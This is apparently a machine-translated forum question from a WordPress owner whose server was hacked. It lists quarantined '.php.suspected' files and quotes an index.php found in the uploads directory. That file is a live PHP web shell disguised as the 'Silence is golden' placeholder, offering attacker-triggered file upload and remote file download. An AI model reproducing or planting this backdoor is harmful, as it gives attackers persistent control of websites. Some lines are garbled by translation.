我们的Wordpress服务器开始运行得非常慢，尽管服务器本身的负载非常低（<；1%）。

wp admin页面根本没有响应。

经过调查，发现该服务器遭到黑客攻击，并且充斥着色情文件。我们正在重建它，但没有备份。

wp uploads目录中似乎有很多这样的文件。除了2013、2014、2015等常用目录外，该目录中是否还应包含其他文件？

此目录的正确权限是什么，它当前是完全公开的。我猜是黑客干的：

drwxrwxrwx 20 root root 4096 Nov 21 12:14 uploads

有一些名为“可疑”的文件。这里发生了什么，他们被隔离了吗？

root@recover-wordpress:~/cleanup/wp-content/uploads# ls -l *suspected
-rw-r--r-- 1 www-data www-data  7593 Sep  7 04:34 0pmr7ai6l.php.suspected
-rw-r--r-- 1 www-data www-data 14304 Sep  6 15:48 3d9gr.php.suspected
-rw-r--r-- 1 www-data www-data   700 Oct 20 11:28 454354353.php.suspected
-rw-r--r-- 1 www-data www-data   510 Aug 26 16:50 NB82WOhjz.php.suspected
-rw-r--r-- 1 www-data www-data   510 Sep 11 14:25 SXEZOfZvicy.php.suspected
-rw-r--r-- 1 www-data www-data  3429 Sep  7 04:32 co1iq.php.suspected
-rw-r--r-- 1 www-data www-data 29936 Sep  6 15:49 cttpgw5y.php.suspected
-rw-r--r-- 1 www-data www-data  5406 Sep  5 05:11 dom1xbub.php.suspected
-rw-r--r-- 1 www-data www-data 19706 Sep  7 04:21 evwsroor.php.suspected

wp uploads目录中还有很多php文件。我注意到在一个新的Wordpress安装中，只有一个目录名为2015。不过，我们确实有几个插件。

例如，有一个名为index的文件。php，看起来很奇怪：

drwxrwxrwx 4根根4096年7月27日03:12浓咖啡

?
<?php
// Silence is golden.
if(isset($_GET[php4])) {echo \'<form action="" method="post"     enctype="multipart/form-data" name="silence" id="silence">\'; echo \'<input     type="file" name="file"><input name="golden" type="submit" id="golden"     value="Done"></form>\';
if( $_POST[\'golden\'] == "Done" ) {if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'+\'; } else { echo \'-\'; }}} if(isset($_GET[php5])) {$file=$_GET["php5"]; $wpf=strrchr($file, \'/\'); $wpf=str_replace("/","",$wpf); $content=file_get_contents($file); $wpt = fopen($wpf, "w"); fwrite($wpt, $content); fclose($wpt); } else {echo \'<title></title>\';}
?>

我可以删除2015类型目录以外的所有内容吗？

还有其他建议吗？